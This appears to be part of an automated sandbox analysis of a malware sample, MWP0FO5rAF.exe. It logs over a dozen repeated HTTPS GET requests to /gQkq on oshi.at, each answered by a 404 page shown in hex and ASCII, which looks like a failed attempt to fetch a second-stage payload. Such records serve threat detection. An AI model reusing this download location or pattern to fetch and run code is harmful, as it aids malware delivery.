                                                            2025-01-10 17:59:04 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            57192.168.2.950036194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:59:06 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:59:06 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:59:06 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:59:06 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            58192.168.2.950037194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:59:07 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:59:08 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:59:08 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:59:08 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            59192.168.2.950038194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:59:09 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:59:10 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:59:10 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:59:10 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            60192.168.2.950039194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:59:14 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:59:15 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:59:14 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:59:15 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            61192.168.2.950040194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:59:16 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:59:16 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:59:16 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:59:16 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            62192.168.2.950041194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:59:18 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:59:18 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:59:18 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:59:18 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            63192.168.2.950042194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:59:19 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:59:20 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:59:20 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:59:20 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            64192.168.2.950043194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:59:21 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:59:22 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:59:22 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:59:22 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            65192.168.2.950044194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:59:23 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:59:24 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:59:23 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:59:24 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            66192.168.2.950045194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:59:25 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:59:26 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:59:25 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:59:26 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            67192.168.2.950046194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:59:27 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:59:28 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:59:28 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:59:28 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            68192.168.2.950047194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:59:30 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:59:30 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:59:30 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:59:30 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            69192.168.2.950048194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:59:31 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:59:32 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:59:32 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:59:32 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            70192.168.2.950049194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:59:33 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:59:34 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:59:34 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:59:34 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


